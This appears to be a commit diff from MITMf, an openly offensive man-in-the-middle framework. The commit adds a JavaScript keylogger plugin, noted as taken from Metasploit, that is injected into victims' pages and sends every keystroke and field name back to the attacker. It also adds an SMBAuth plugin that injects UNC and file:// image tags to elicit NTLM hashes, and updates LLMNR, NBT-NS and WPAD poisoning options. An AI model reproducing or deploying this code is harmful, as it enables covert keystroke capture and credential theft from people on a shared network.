WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it)

the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them.
Modified and re-added the JS-keylogger and SMBauth plugins

plugins/Inject.py

@@ -87,14 +87,13 @@ class Inject(CacheKill, Plugin):
                 self.dtable[ip+hn] = True
                 self.count += 1
                 mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
-                return {'request': request, 'data': data}
-            else:
-                return
+        
+        return {'request': request, 'data': data}
 
     def _get_payload(self):
         return self._get_js() + self._get_iframe() + self.html_payload
 
-    def add_options(self,options):
+    def add_options(self, options):
         options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
         options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
         options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
@@ -136,7 +135,6 @@ class Inject(CacheKill, Plugin):
         if self.per_domain:
             return not ip+hn in self.dtable
 
-        #print mime
         return mime.find(self.mime) != -1
 
     def _get_req_info(self, request):

plugins/JsKeylogger.py

@@ -0,0 +1,167 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+import logging
+
+class jskeylogger(Inject, Plugin):
+    name       = "Javascript Keylogger"
+    optname    = "jskeylogger"
+    desc       = "Injects a javascript keylogger into clients webpages"
+    implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
+    depends    = ["Inject"]
+    version    = "0.2"
+    has_opts   = False
+
+    def initialize(self, options):
+        Inject.initialize(self, options)
+        self.html_payload = self.msf_keylogger()
+
+    def sendPostData(self, request):
+        #Handle the plugin output
+        if 'keylog' in request.uri:
+
+            raw_keys = request.postData.split("&&")[0]
+            keys = raw_keys.split(",")
+            del keys[0]; del(keys[len(keys)-1])
+
+            input_field = request.postData.split("&&")[1]            
+
+            nice = ''
+            for n in keys:
+                if n == '9':
+                    nice += "<TAB>"
+                elif n == '8':
+                    nice = nice.replace(nice[-1:], "")
+                elif n == '13':
+                    nice = ''
+                else:
+                    try:
+                        nice += n.decode('hex')
+                    except:
+                        mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
+
+            #try:
+            #     input_field = input_field.decode('hex')
+            #except:
+            #    mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
+            
+            mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
+
+    def msf_keylogger(self):
+        #Stolen from the Metasploit module http_javascript_keylogger
+
+        payload = """<script type="text/javascript">
+window.onload = function mainfunc(){
+var2 = ",";
+name = '';
+function make_xhr(){
+    var xhr;
+            try {
+                xhr = new XMLHttpRequest();
+            } catch(e) {
+                try {
+                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
+                } catch(e) {
+                    xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
+                }
+            }
+            if(!xhr) {
+                throw "failed to create XMLHttpRequest";
+            }
+            return xhr;
+        }
+        
+        xhr = make_xhr();
+        xhr.onreadystatechange = function() {
+            if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
+                eval(xhr.responseText);
+            }
+        }
+
+if (window.addEventListener) {
+document.addEventListener('keypress', function2, true);
+document.addEventListener('keydown', function1, true);
+} else if (window.attachEvent) {
+document.attachEvent('onkeypress', function2);
+document.attachEvent('onkeydown', function1);
+} else {
+document.onkeypress = function2;
+document.onkeydown = function1;
+}
+
+}
+
+function function2(e)
+{
+    srcname = window.event.srcElement.name;
+    var3 = (window.event) ? window.event.keyCode : e.which;
+    var3 = var3.toString(16);
+    
+    if (var3 != "d")
+    {
+        andxhr(var3, srcname);
+    }
+}
+
+function function1(e)
+{
+    srcname = window.event.srcElement.name;
+    id = window.event.srcElement.id;
+
+    var3 = (window.event) ? window.event.keyCode : e.which;
+    if (var3 == 9 || var3 == 8 || var3 == 13)
+    {
+        andxhr(var3, srcname);
+    }
+    else if (var3 == 0)
+    {
+        
+        text = document.getElementById(id).value;
+        if (text.length != 0)
+        {   
+            andxhr(text.toString(16), srcname);
+        }
+    } 
+}
+
+function andxhr(key, inputName)
+{   
+    if (inputName != name)
+    {
+        name = inputName;
+        var2 = ",";
+    }
+
+    var2= var2 + key + ",";
+
+    xhr.open("POST", "keylog", true);
+    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+    xhr.send(var2 + '&&' + inputName);
+    
+    if (key == 13 || var2.length > 3000)
+    {
+        var2 = ",";
+    }
+}
+</script>"""
+
+        return payload

plugins/Responder.py

@@ -18,13 +18,12 @@
 # USA
 #
 
-import sys
-import os
 import threading
 
 from plugins.plugin import Plugin
 from twisted.internet import reactor
 from core.utils import SystemConfig
+
 from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner
 from core.responder.wpad.WPADPoisoner import WPADPoisoner
 from core.responder.mdns.MDNSPoisoner import MDNSPoisoner
@@ -57,9 +56,9 @@ class Responder(Plugin):
         KERBServer().start()
         NBTNSPoisoner().start(options, self.ourip)
         LLMNRPoisoner().start(options, self.ourip)
-        
+
         if options.wpad:
-            WPADPoisoner().start()
+            WPADPoisoner().start(options)
 
         if options.analyze:
             self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
@@ -69,10 +68,10 @@ class Responder(Plugin):
 
     def add_options(self, options):
         options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
-        options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
-        options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
-        options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
-        options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
-        options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
-        options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
-        options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
+        options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries")
+        options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries")
+        options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "Fingerprint hosts that issued an NBT-NS or LLMNR query")
+        options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier")
+        options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Start the WPAD rogue proxy server")
+        #options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
+        #options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")

plugins/SMBAuth.py

@@ -0,0 +1,42 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+from core.utils import SystemConfig
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+
+class SMBAuth(Inject, Plugin):
+    name     = "SMBAuth"
+    optname  = "smbauth"
+    desc     = "Evoke SMB challenge-response auth attempts"
+    depends  = ["Inject"]
+    version  = "0.1"
+    has_opts = False
+
+    def initialize(self, options):
+        Inject.initialize(self, options)
+        self.target_ip = SystemConfig.getIP(options.interface)
+        
+        self.html_payload = self._get_data()
+
+    def _get_data(self):
+        return '<img src=\"\\\\%s\\image.jpg\">'\
+                '<img src=\"file://///%s\\image.jpg\">'\
+                '<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">' % tuple([self.target_ip]*3)